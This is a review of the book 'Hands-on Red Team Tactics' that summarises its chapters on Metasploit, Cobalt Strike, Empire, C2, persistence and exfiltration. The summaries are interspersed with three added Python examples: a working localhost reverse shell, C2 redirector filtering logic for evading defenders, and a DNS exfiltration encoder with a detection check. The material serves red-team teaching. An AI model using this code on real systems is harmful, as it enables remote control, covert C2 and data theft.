The red teaming concept has existed since the 6th century BCE, when the ancient military strategist Sun Tzu wrote that "…one who knows the enemy and knows himself will not be endangered in a hundred engagements." Today, red teaming continues to evolve to fit the needs of the organization. Although the current style of red teaming in the military and in business organizations around the world may differ slightly, both are increasingly finding success with plans shaped by the structured, iterative processes that adequately educated and trained red teamers bring.
A red teamer possesses the intellectual courage to challenge assumptions, mitigate cultural and cognitive biases, and counter groupthink. The modern red teaming process originated in the U.S. military in the 1960s, at the height of the Cold War with the Soviet Union. The term "red team" emerged from game-theory approaches applied to war-gaming and scenario simulations designed to evaluate strategic decisions. Red teamers are able to think holistically about an issue or problem and analyze it from the perspectives of their own organization, its clients, its competitors, and its business executives.
In the current world of bug bounty hunters and traditional penetration testers, I am happy that the authors have tried to change and challenge traditional approaches and redefine methodologies, and, most importantly, that instead of writing up conventional techniques they have put together new content and procedures that empower the reader with knowledge.
There are a total of 13 chapters in the book, which are as follows:
- Red-Teaming and Pentesting
- Pentesting 2018
- Foreplay – Metasploit Basics
- Getting Started with Cobalt Strike
- ./ReverseShell
- Pivoting
- Age of Empire – The Beginning
- Age of Empire – Owning Domain Controllers
- Cobalt Strike – Red Team Operations
- C2 – Master of Puppets
- Obfuscating C2s – Introducing Redirectors
- Achieving Persistence
- Data Exfiltration
To keep things clear and to the point for the reader, I will go through the chapters in order and give a streamlined summary of what each one covers.
Chapter 1: Red-Teaming & Pentesting
The book starts with a short, crisp and precise introduction to penetration testing. The section touches on OWASP, OSSTMM, ISSAF and PTES, then goes into the details of PTES, and then explains the difference between a traditional penetration test and a red team exercise: how red team methodologies differ and what is different in the red team approach.
Chapter 2: Pentesting 2018
Despite what the title suggests, this chapter primarily focuses on the use of two tools: MSFvenom Payload Creator (MSFPC) and Koadic. I liked that the author has gone into the details of both tools, starting from where to download them and moving on to examples of how to use them, in a very descriptive flow.
Chapter 3: Foreplay – Metasploit Basics
This chapter starts with background on Metasploit, then goes into the commands and features it offers. It then moves on to setting up Armitage and its team server, how to connect it with Slack, and ends with a note on how to use Cortana scripts with Armitage.
Chapter 4: Getting Started with Cobalt Strike
As the chapter's name suggests, this chapter covers Cobalt Strike, starting from what is required to set it up, through an explanation of the different buttons on its user interface, to how to generate payloads and connect to team servers. The first part of the chapter contains a nice note on how to plan a red team activity; however, I believe that note would have been delivered better in chapter 2. The chapter ends with a note on how to secure your team server.
Chapter 5: ./ReverseShell
This chapter focuses on multiple techniques for obtaining a reverse shell connection. It goes into detail on tools like netcat, ncat, socat, cryptcat and powercat, then gives examples of getting reverse shell connections using payloads such as reverse_tcp, reverse_tcp_rc4 and reverse_https. The chapter also covers using ngrok to receive a connection from a system behind NAT, and ends with a reverse shell cheat sheet.
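To make the connect-back mechanics the chapter describes concrete, here is an added example (my own, not code from the book) of a minimal TCP reverse shell with both ends in one process: the "operator" side binds and waits, the "implant" side connects back and executes whatever command line arrives, returning the output behind a constructed end-of-output delimiter. The port is assigned by the OS and the whole exchange stays on 127.0.0.1; commands are run with the local shell, so this is Unix-oriented. Like the plain reverse_tcp payload the chapter mentions, everything here is sent in cleartext, which is exactly why the book also covers reverse_tcp_rc4 and reverse_https.

```python
"""Minimal TCP reverse shell, operator and implant in one process.
Added example; not code from "Hands-on Red Team Tactics".
Runs entirely on localhost and uses the local /bin/sh (assumption)."""
import socket
import subprocess
import threading

END = b"<<END>>\n"   # constructed delimiter the implant appends after each command's output


def implant(host: str, port: int) -> None:
    """Target side: connect back to the operator, run each line as a shell command."""
    with socket.create_connection((host, port)) as s, s.makefile("rb") as cmds:
        for line in cmds:                       # one command per line
            cmd = line.decode(errors="replace").strip()
            if cmd == "exit":
                return
            res = subprocess.run(cmd, shell=True, capture_output=True)
            s.sendall(res.stdout + res.stderr + END)


class Operator:
    """Attacker side: bind a listener, accept the connect-back, drive the shell."""

    def __init__(self, host: str = "127.0.0.1", port: int = 0):
        self.srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.srv.bind((host, port))             # port 0: let the OS pick a free port
        self.srv.listen(1)
        self.host, self.port = self.srv.getsockname()
        self.conn = None
        self.rfile = None

    def accept(self) -> None:
        self.conn, _ = self.srv.accept()
        self.rfile = self.conn.makefile("rb")

    def run(self, cmd: str) -> str:
        """Send one command and read its output up to the delimiter."""
        self.conn.sendall(cmd.encode() + b"\n")
        buf = b""
        while not buf.endswith(END):
            chunk = self.rfile.readline()
            if not chunk:                       # implant went away
                break
            buf += chunk
        if buf.endswith(END):
            buf = buf[: -len(END)]
        return buf.decode(errors="replace")

    def close(self) -> None:
        try:
            self.conn.sendall(b"exit\n")
        finally:
            self.rfile.close()
            self.conn.close()
            self.srv.close()


def demo(cmd: str = "echo hello") -> str:
    """Start a listener, launch the implant in a thread, run one command, return its output."""
    op = Operator()
    t = threading.Thread(target=implant, args=(op.host, op.port), daemon=True)
    t.start()
    op.accept()
    out = op.run(cmd)
    op.close()
    t.join(timeout=5)
    return out.strip()


if __name__ == "__main__":
    print(demo("id"))
```

The delimiter is needed because a raw TCP stream has no message boundaries; the real tools the chapter covers either do the same thing (a prompt or marker) or wrap traffic in a framed protocol such as Meterpreter's TLV.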
Chapter 6: Pivoting
This chapter covers different pivoting techniques. It starts with port-forwarding and pivoting via SSH, moves on to Meterpreter port forwarding and pivoting via Armitage, and ends with a short note on multi-level pivoting.
Chapter 7: Age of Empire – The Beginning
This chapter covers a very well-known and powerful post-exploitation framework: Empire. It starts with an excellent tutorial on how to set up Empire, then explains its primary usage along with examples of post-exploitation basics on Windows, Linux and OS X, and closes with a nice note on popping a Meterpreter session from Empire and setting up Slack alerts.
Chapter 8: Age of Empire – Owning Domain Controllers
This chapter continues the previous one on Empire. Where the last chapter focused on Empire basics and getting access to systems, this one focuses on gaining access to the Domain Controller. It also covers automating AD exploitation and the Empire GUI web interface.
Chapter 9: Cobalt Strike – Red Team Operations
This chapter continues chapter 4 on Cobalt Strike and goes into more detail on its features: listeners, their types and usage; beacons and their functions, with examples; a walkthrough of the beacon menu and beacon console; and finally pivoting using Cobalt Strike. The chapter ends with a note on Aggressor scripts.
Chapter 10: C2 – Master of Puppets
This chapter explains what C2 servers are and how they help in red team operations. After a brief introduction to C2, the chapter gives a detailed tutorial on using cloud services such as Dropbox and OneDrive as C2 servers, and then on how to set up covert C2 channels.
Chapter 11: C2s – Introducing Redirectors
This chapter continues the previous one and focuses on obfuscating and hiding the C2 server from the network and from the blue team. It introduces the concept of redirectors, how to obfuscate C2 securely, the types of redirectors (short-term and long-term), and the different methods: dumb pipe redirection, filtration/smart redirection and domain fronting.
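The difference between a dumb pipe and a filtering ("smart") redirector is the decision the redirector makes per request. Here is an added example of that decision logic (my own code, not from the book or from any particular redirector tool): a small HTTP request parser and a routing function that relays a request to the real C2 only when its URI and User-Agent match what the implant was configured to send, and answers everything else (scanners, curious analysts, crawlers) with a decoy. The beacon URIs and User-Agent string are constructed stand-ins for whatever a real C2 profile would contain. In production this is what an Apache mod_rewrite rule with RewriteCond on %{REQUEST_URI} and %{HTTP_USER_AGENT} in front of a ProxyPass does; the Python form just makes the logic testable.

```python
"""Routing decision of a filtering ("smart") redirector.
Added example; not code from the book or from any real redirector.
The profile values below are constructed, not a real C2 profile."""
from dataclasses import dataclass
from typing import Dict

# Constructed C2 profile: what the implant is configured to request and to send.
BEACON_URIS = {"/api/v2/status", "/assets/app.js"}
BEACON_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Constructed/1.0"


@dataclass
class Request:
    method: str
    path: str            # request target with any query string removed
    headers: Dict[str, str]


def parse_request(raw: bytes) -> Request:
    """Parse the request line and headers of a raw HTTP/1.x request head."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()   # header names are case-insensitive
    return Request(method.upper(), target.split("?", 1)[0], headers)


def route(req: Request) -> str:
    """Return "c2" to relay upstream to the team server, "decoy" to answer locally."""
    if req.method not in ("GET", "POST"):
        return "decoy"                     # the implant only ever uses these two
    if req.path not in BEACON_URIS:
        return "decoy"                     # unknown URI: not our implant
    if req.headers.get("user-agent") != BEACON_UA:
        return "decoy"                     # right URI, wrong client: scanner or analyst
    return "c2"


def route_raw(raw: bytes) -> str:
    """Convenience wrapper: parse then route."""
    return route(parse_request(raw))


if __name__ == "__main__":
    beacon = (b"GET /api/v2/status?id=7 HTTP/1.1\r\nHost: cdn.example\r\n"
              b"User-Agent: " + BEACON_UA.encode() + b"\r\n\r\n")
    print(route_raw(beacon))
```

The dumb-pipe variant is simply `route` returning "c2" unconditionally, which is why it gives the blue team a direct line to the real infrastructure the moment they poke at the redirector; the filtering version fails closed to a decoy. The matching here is exact; a real deployment would also check the Host header and often rotate the profile, which the chapter's long-term versus short-term redirector distinction is about.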
Chapter 12: Achieving Persistence
This chapter briefly covers achieving persistence once a target has been compromised and the role persistence plays in a typical red team exercise. It covers the different types of persistence and how to achieve them via Armitage, via Empire on Windows, OS X and Linux, and via Cobalt Strike with Aggressor scripts.
Chapter 13: Data Exfiltration
This last chapter of the book gives brief background on data exfiltration and why it is needed in an exercise, then explains techniques using tools and channels like ncat, OpenSSL, PowerShell, DNS, Dropbox and Empire. The chapter also has a tutorial on the CloakifyFactory tool, which primarily helps in bypassing DLP solutions.
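Of the channels the chapter names, DNS is the one whose mechanics are least obvious from the tool names alone, so here is an added example (my own code, not from the book) of how data is smuggled out in DNS query names: the payload is base32-encoded (DNS names are case-insensitive, so base64 is unsafe), split into labels of at most 63 characters, and packed into names of at most 253 characters with a sequence number and a constructed file identifier in front, under a domain the operator controls. The decoder reassembles the stream from the query log, and a small check shows what the blue team side looks for. The domain and identifier are constructed placeholders.

```python
"""DNS exfiltration encoder/decoder and a simple detection heuristic.
Added example; not code from the book or from any real tool.
"example.com" and the file id are constructed placeholders."""
import base64
from typing import Dict, List

MAX_LABEL = 63    # RFC 1035 limit per label
MAX_NAME = 253    # practical limit for a full name in presentation form


def encode_queries(data: bytes, domain: str, file_id: str, label_len: int = 50) -> List[str]:
    """Pack `data` into query names: <seq>.<file_id>.<label>...<label>.<domain>."""
    label_len = min(label_len, MAX_LABEL)
    b32 = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    queries: List[str] = []
    pos, seq = 0, 0
    while pos < len(b32):
        prefix = f"{seq:04x}.{file_id}"           # sequence number lets the decoder reorder
        labels: List[str] = []
        name_len = len(prefix) + 1 + len(domain)
        while pos < len(b32):
            piece = b32[pos:pos + label_len]
            if name_len + 1 + len(piece) > MAX_NAME:
                break                            # this name is full; start the next one
            labels.append(piece)
            name_len += 1 + len(piece)
            pos += len(piece)
        if not labels:
            raise ValueError("domain and prefix leave no room for payload labels")
        queries.append(".".join([prefix, *labels, domain]))
        seq += 1
    return queries


def decode_queries(queries: List[str], domain: str, file_id: str) -> bytes:
    """Reassemble the payload from the (possibly reordered) names seen for `file_id`."""
    pieces: Dict[int, str] = {}
    suffix = "." + domain
    for name in queries:
        if not name.endswith(suffix):
            continue
        parts = name[: -len(suffix)].split(".")
        if len(parts) < 3 or parts[1] != file_id:
            continue
        pieces[int(parts[0], 16)] = "".join(parts[2:])
    b32 = "".join(pieces[k] for k in sorted(pieces)).upper()
    b32 += "=" * (-len(b32) % 8)                  # restore the padding we stripped
    return base64.b32decode(b32)


def looks_like_exfil(name: str, domain: str, max_sub_len: int = 60) -> bool:
    """Blue-team heuristic: an unusually long subdomain part under a single zone."""
    suffix = "." + domain
    if not name.endswith(suffix):
        return False
    return len(name) - len(suffix) > max_sub_len


if __name__ == "__main__":
    sample = b"constructed sample payload\n" * 20
    qs = encode_queries(sample, "example.com", "f1")
    print(len(qs), "queries;", "roundtrip ok" if decode_queries(qs, "example.com", "f1") == sample else "MISMATCH")
```

Two points a practitioner should take from this: the channel is low-bandwidth (roughly 200 bytes of payload per query name here, before base32 overhead), and it is noisy, which is why length and entropy heuristics on subdomain labels, as in `looks_like_exfil`, are a standard detection. Real tools add encryption and often use TXT or NULL records for the downstream direction; this example only shows the upstream name-encoding step.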
Final Notes: Above I have tried to give a short idea of all the chapters of the book. The step-by-step approach makes it very comfortable for readers to follow along and reproduce the same steps on their own system, provided all the steps are followed exactly as the authors describe them.
- The book is very reasonably priced and its content is concise.
- The book's primary focus is newcomers who want to learn about red team operations, but it is equally beneficial for pen-testers, as it contains various new methods of infiltration.
- The book is self-paced and spans different streams of exploitation: application, network and systems.
- The book can be used as a reference guide for red teamers and a study guide for newcomers.
- In some places I have observed a gap in the flow; however, given the technicality of the content, that is understandable.
- For Content, I would rate it 8/10
- For Grammar, I would rate it 7.5/10
- For Technicality, I would rate it 8.5/10
- For Deliverance of the subject, I would rate it 7.8/10
Overall Rating: 8/10, based on the subject, the material delivered, proof-reading, self-pacing and technicality of the subject covered. The evaluation depends on personal perspective and the reader's own preferences in the matter.
This final section, I think, is personally opinion-based, and I recommend this book to each and every InfoSec enthusiast and professional; after reading it you will have a clear understanding of red team operations and how they differ from your typical VAPT. (For God's sake, just end the fight: VAPT != Red Team Assessment.)
I thank you for reading this review of "Hands-on Red Team Tactics"; it has been interesting to deliver a review of someone else's work. The security community wouldn't be as far along as it is now if it weren't for people like Himanshu Sharma and Harpreet Singh, who contribute their time and invest their focus in different areas of digital security research, finding daylight through the trees in the midst of the forest. I hope this post has delivered an unbiased review, and I will keep putting in the effort to make things higher quality.
Disclaimer: The authors of the book are my old friends, and one of the authors is my coworker. However, I have tried my best to be as unbiased as I can be.